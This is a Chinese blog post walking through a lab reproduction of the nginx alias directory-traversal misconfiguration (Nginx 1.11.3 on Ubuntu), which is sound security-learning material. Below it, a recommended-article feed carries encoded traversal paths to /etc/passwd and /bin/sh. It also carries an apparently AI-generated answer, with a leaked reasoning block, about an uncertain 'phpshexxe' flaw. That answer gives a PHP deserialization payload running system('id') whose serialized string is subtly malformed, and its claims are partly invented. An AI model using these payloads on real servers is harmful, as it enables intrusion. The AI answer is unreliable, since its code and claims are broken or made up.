[漏洞复现]——nginx目录穿越漏洞

最新推荐文章于 2025-03-02 00:30:00 发布
最新推荐文章于 2025-03-02 00:30:00 发布
阅读量6.4k 收藏 3
点赞数 2
分类专栏: 漏洞复现 文章标签: nginx web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46607055/article/details/121641417
版权

前言

曾记得面试时被问到这个漏洞,当时没答上来,所以好好学习一下

原理

Nginx (engine x) 是一个高性能的HTTP和反向代理服务器,Nginx经常被做为反向代理,动态的部分被proxy_pass传递给后端端口,而静态文件需要Nginx来处理。

漏洞出现在服务器的静态文件中。

如果静态文件存储在/home/目录下,而该目录在url中名字为files,那么就需要用alias设置目录的别名:

 

url上/files没有加后缀/,而alias设置的/home/是有后缀/的,这个/就导致我们可以从/home/目录穿越到他的上层目录(具体也不太理解,后续补上)

漏洞验证 

复现漏洞

环境搭建

Ubuntu 16.04 + Nginx 1.11.3

获得root权限
sudo -i

安装nginx依赖库和gcc g++的依赖库
apt-get install build-essential
apt-get install libtool

安装pcre依赖库
apt-get install libpcre3 libpcre3-dev

安装zlib依赖库
apt-get install zlib1g-dev

安装ssl依赖库
apt-get install openssl

安装nginx
wget http://nginx.org/download/nginx-1.11.3.tar.gz

解压
tar -zxvf nginx-1.11.3.tar.gz

进入解压目录:
cd nginx-1.11.3

配置:
./configure --prefix=/usr/local/nginx

安装nginx:
make

启动nginx:
/usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf

访问是否搭建成功

 修改Nginx配置文件

apt-get install vim
vim /usr/local/nginx/conf/nginx.conf

效果如图

重启Nginx

cd /usr/local/nginx
./sbin/nginx -s reload

验证漏洞

正常访问

目录穿越

 

漏洞修复

重启Nginx

 

cd /usr/local/nginx
./sbin/nginx -s reload

 

参考:

nginx目录穿越漏洞复现 - 雨中落叶 - 博客园 

Nginx目录穿越漏洞 - Eleven_Liu - 博客园

nginx访问静态图片403 forbidden_五个案例“熄灭”Nginx漏洞隐患
weixin_39980353的博客
11-23 907
Nginx从2004年10月发布至今,已经趋于成熟和完善。在连接高并发的情况下,Nginx是Apache服务不错的替代品,作为一款分布式轻量级的中间件Nginx也是存在大量的漏洞的。 下面我们针对常见的漏洞来进行探讨。01目录遍历漏洞漏洞介绍Nginx的目录遍历漏洞属于配置不当导致的漏洞,错误的配置使得目录被遍历与源码泄露‘。该漏洞的产生与nginx.conf文件中的autoindex(目录浏览功...
中间件安全-CVE漏洞复现+Apache+Tomcat+Nginx
xiaoheizi的博客
07-13 393
访问路径更改为:/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd 因为是Unix系统,所以敏感信息在/etc/passwd下,放包成功获取数据。将访问路径更改为:/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh。点击测试链接,如果测试成功就点击添加。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。打开vulfocus靶场,启动漏洞环境,打开漏洞地址。
NGINX-目录穿越漏洞
大方子
07-29 4286
复现环境 centos7 docker vulhub(git) 复现过程 进入/root/vulhub/nginx/insecure-configuration目录 输入docker compose up -d 开启容器 访问下files 在files后面加上..可穿越到上级目录 导致漏洞的原因,url上/files没有加后缀/,而ali...
Nginx漏洞复现与防御实战|2024最新CVE解析(含目录遍历/文件解析绕过/反向代理漏洞EXP复现+安全加固方案)渗透测试工程师必看」
浩策盾悟
03-02 4768
通过访问config.do配置页面,先更改Work Home工作目录,用有效的已部署的Web应用目录替换默认的存储JKS Keystores文件的目录,之后使用"添加Keystore设置"的功能,可上传恶意的JSP脚本文件。而反序列话则是再把字节序列恢复为java对象的过程,然而就在这一转一变得过程中,程序员的过滤不严格,就可以导致恶意构造的代码的实现。IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。
Nginxnginx目录遍历漏洞
kevin的博客
07-14 5455
除了X-Forwarded-For伪造客户端IP漏洞,发现还要修改关于目录遍历的漏洞,这里简单记录一下。Nginx 目录遍历(Nginx Directory Traversal)是一种安全漏洞,通常会影响 Nginx 服务器上的 Web 应用程序。该漏洞允许攻击者通过利用应用程序代码中的错误配置或代码漏洞,来访问系统中未经授权的文件和目录。
Nginx漏洞修复之目录穿越(目录遍历)漏洞复现及修复
热门推荐
CharlesYan的博客
02-15 2万+
Nginx目录穿越(目录遍历)漏洞描述及修复方案
nginx目录穿越漏洞(insecure-configuration)
weixin_60719780的博客
12-05 1301
漏洞是由于配置错误导致的漏洞原理:传送门这个常见于Nginx做反向代理的情况,动态的部分被proxy_pass传递给后端端口,而静态文件需要Nginx来处理。环境:vulhub靶场 进入nginx/insecure-configuration运行docker-compose up -d 8081端口为目录穿越漏洞 我们打开docker-compose.yml文件,看看里面的关系 我们发现./files/:/home/ 将/files/影射到了home目录下, 进入镜像去看看,查看/home目录下的
细说漏洞挖掘
bluemoon_0的博客
03-14 324
细说漏洞挖掘
渗透测试之中间件安全
Blood_Pupil的博客
05-21 4545
IIS 版本 漏洞 可利用度 利用场景 6.0 Put漏洞 (默认状态?) Webshell上传 1.0-10.0(全版本) 短文件名猜解 低 敏感文件下载,猜后台,猜敏感文件 6.0 远程代码执行(ms-16-016) 高 提权 PUT漏洞 短文件名猜解漏洞 漏洞形成原因 此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(〜)波浪号引起的。 利...
详细分析PHP源代码后门事件及其供应链安全启示
smellycat000的专栏
03-30 2132
聚焦源代码安全,网罗国内外最新资讯!专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根...
目录穿越漏洞
weixin_52635036的博客
08-10 593
这个漏洞就是定界符出现问题,location /files后面没有/ 那么这样的话 它可以发送files..这样的数据过来,/files的别名是/home/,那么..就会跟到后面变成/home/..,这样一来就从home穿越回根目录了 怎么修复呢。www.xianoupeng.com/files 这实际上是静态文件的目录 但真正静态文件存在/home下的,所以就需要在nginx下给files给个别名,这样一来,我访问files,就能找到/home/文件夹里。
Nginx目录穿越漏洞
dl71181的博客
07-22 436
Nginx (engine x) 是一个高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/SMTP服务器。Nginx经常被做为反向代理,动态的部分被proxy_pass传递给后端端口,而静态文件需要Nginx来处理。 如果静态文件存储在/home/目录下,而该目录在url中名字为files,那么就需要用alias设置目录的别名: 此时,访问http:/...
记一次nginx目录遍历漏洞修复
weixin_50801368的博客
06-21 1100
nginx目录遍历漏洞修复
攻击NGINX服务器漏洞使用包含服务器信息的暴露 NGINX 配置文件 “ngix.conf“ 更改配置值 。
qq_24496111的博客
01-16 367
https://crackingx.com/threads/9003/
nginx常见漏洞解析
qtttgeq的博客
04-06 1万+
0×1HTTP返回包头:就是httpresponsHTTP返回包体:就是请求的具体文件,例如出来个网页资源,网页内嵌套的内容等等。content-range是什么?range是什么?存在于HTTP请求头中,表示请求目标资源的部分内容,例如请求一个图片的前半部分,单位是byte,原则上从0开始,但今天介绍的是可以设置为负数。range的典型应用场景例如:断点续传、分批请求资源。content-range的表达方式:Range:bytes=0-1024 表示访问第0到第1024字节;
nginx常见漏洞解析_nginx漏洞(2),2024年最新【一篇文章搞懂
2401_84181340的博客
04-10 3971
中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。但是在开发使用过程中也不乏官方程序自身的一些安全问题。我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了解程度,只谈发现漏洞后如何处理,便是一团乱。开发商推卸说这并不是代码上的问题,他们完全是按照安全开发流程(SDL)走的,所以跟他无关。
nginx中的proxy_pass配置
az44yao的专栏
12-05 591
原文链接:https://blog.csdn.net/m0_61726796/article/details/132984722。对于接口代理、负载均衡很是实用,但 proxy_pass指令后面的参数很有讲究,通常一个/都可能引发一个血案。通常nginx配置proxy_pass指令时,如果proxy_pass后面的url加/,表示绝对根路径;2.代理到URL:http://127.0.0.1/proxy/test.html。1.代理到URL:http://127.0.0.1/test.html。
nginx 之 proxy_pass详解
weixin_42165041的博客
03-06 6712
nginx中配置proxy_pass代理转发时,如果在proxy_pass后面的url加/,表示绝对根路径;如果没有/,表示相对路径,把匹配的路径部分也给代理走。假设下面四种情况分别用进行访问。第一种:第二种(相对于第一种,最后少一个 / )第三种:proxy_pass;第四种(相对于第三种,最后少一个 / )proxy_pass;nginx中有两个模块都有proxy_pass指令。
nginx常见漏洞解析_nginx漏洞,2024年最新蚂蚁金服网络安全架构面试题
2401_83621541的博客
04-15 1478
中间件漏洞可以说是最容易被web管理员忽视的漏洞,原因很简单,因为这并不是应用程序代码上存在的漏洞,而是属于一种应用部署环境的配置不当或者使用不当造成的。但是在开发使用过程中也不乏官方程序自身的一些安全问题。我们在处理应急响应事件时经常遇到这么一种情况,客户网站代码是外包的,也就是第三方公司负责开发,而部署可能是由客户内部运维人员负责。暂不说他们对于中间件安全的重视程度与了解程度,只谈发现漏洞后如何处理,便是一团乱。开发商推卸说这并不是代码上的问题,他们完全是按照安全开发流程(SDL)走的,所以跟他无关。
phpshexxe漏洞复现
最新发布
03-10
<think>好的,用户想查找关于PHP反序列化漏洞phpshexxe的复现方法或案例。首先,我需要确认phpshexxe是否是一个已知的漏洞名称,或者是否有拼写错误。可能用户指的是某个特定CMS或框架的反序列化漏洞,比如phpshe、PHPCMS或其他类似名称的项目。 根据提供的引用,用户提到了PHP反序列化漏洞,相关引用[1]、[2]、[3]都涉及PHP反序列化,尤其是引用[1]详细解释了漏洞触发的原因。引用[2]提到了一个具体的URL和复现步骤,可能是一个实际案例。引用[3]提到了CTF中的PHP反序列化考点,可能涉及利用方法。虽然引用[4]和[5]是关于Fastjson的Java漏洞,但用户的问题集中在PHP上,所以可能需要忽略这些。 接下来,我需要检查是否存在名为phpshexxe的漏洞。可能用户将phpshe和XXE(XML外部实体注入)混淆,或者是指某个特定应用。假设phpshexxe是phpshe的某个反序列化漏洞,需要查找是否有相关案例。 根据现有引用,引用[2]提到一个具体的PHPMyAdmin setup.php反序列化漏洞复现步骤,这可能是一个类似的案例。此外,引用[3]中的CTF题目可能涉及PHP反序列化的利用,可能提供思路。 用户可能需要具体的复现步骤,包括环境搭建、漏洞触发点、利用链构造和Payload生成。需要结合PHP反序列化的基本原理,如魔术方法(__wakeup, __destruct等)的利用,以及如何构造恶意序列化数据。 需要确保回答符合系统级指令:使用正确的中文,行内公式用$...$,独立公式用$$...$$,但当前问题可能不需要数学公式。生成相关问题,并正确引用提供的参考。 可能存在的信息缺口是具体的phpshexxe漏洞细节,如果该漏洞不存在或名称有误,需要指出可能的拼写错误,并提供通用复现方法。同时,需要引用提供的参考资料,尤其是引用[1]、[2]、[3]中的内容。 最后,生成相关问题,确保问题与PHP反序列化漏洞相关,帮助用户深入理解。</think>### PHP反序列化漏洞(phpshexxe)复现方法与案例分析 PHP反序列化漏洞通常因未对用户输入的序列化数据严格过滤,导致恶意代码执行或敏感数据泄露。根据引用[^1],漏洞触发核心在于反序列化时自动调用魔术方法(如`__destruct`、`__wakeup`),攻击者可构造恶意对象实现注入。 --- #### **复现步骤示例(以PHPMyAdmin setup.php漏洞为例)[^2]** 1. **环境搭建** - 部署存在漏洞的PHP版本(如PHP 5.x)及目标应用(如旧版phpMyAdmin)。 - 启动Web服务(Apache/Nginx)并配置数据库。 2. **漏洞触发点定位** - 目标文件:`scripts/setup.php`,通过参数传递未过滤的序列化数据。 - 构造Payload:序列化包含恶意代码的类实例。 ```php class Exploit { public $payload = "system('id');"; public function __destruct() { eval($this->payload); } } $exploit = serialize(new Exploit()); echo $exploit; // 生成恶意序列化字符串 ``` 3. **漏洞利用** - 发送构造的Payload至目标接口: ```http GET /phpmyadmin/scripts/setup.php?data=O:7:"Exploit":1:{s:7:"payload";s:10:"system('id');";} ``` - 若成功,服务器会执行`id`命令并返回结果。 --- #### **关键利用条件** 1. 存在可被反序列化的类且其魔术方法包含危险操作。 2. 反序列化入口未对输入数据进行验证或过滤。 --- #### **防御建议** 1. 禁用`unserialize()`函数或严格校验输入数据。 2. 使用`json_decode()`替代序列化操作。 3. 限制敏感魔术方法的执行权限。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值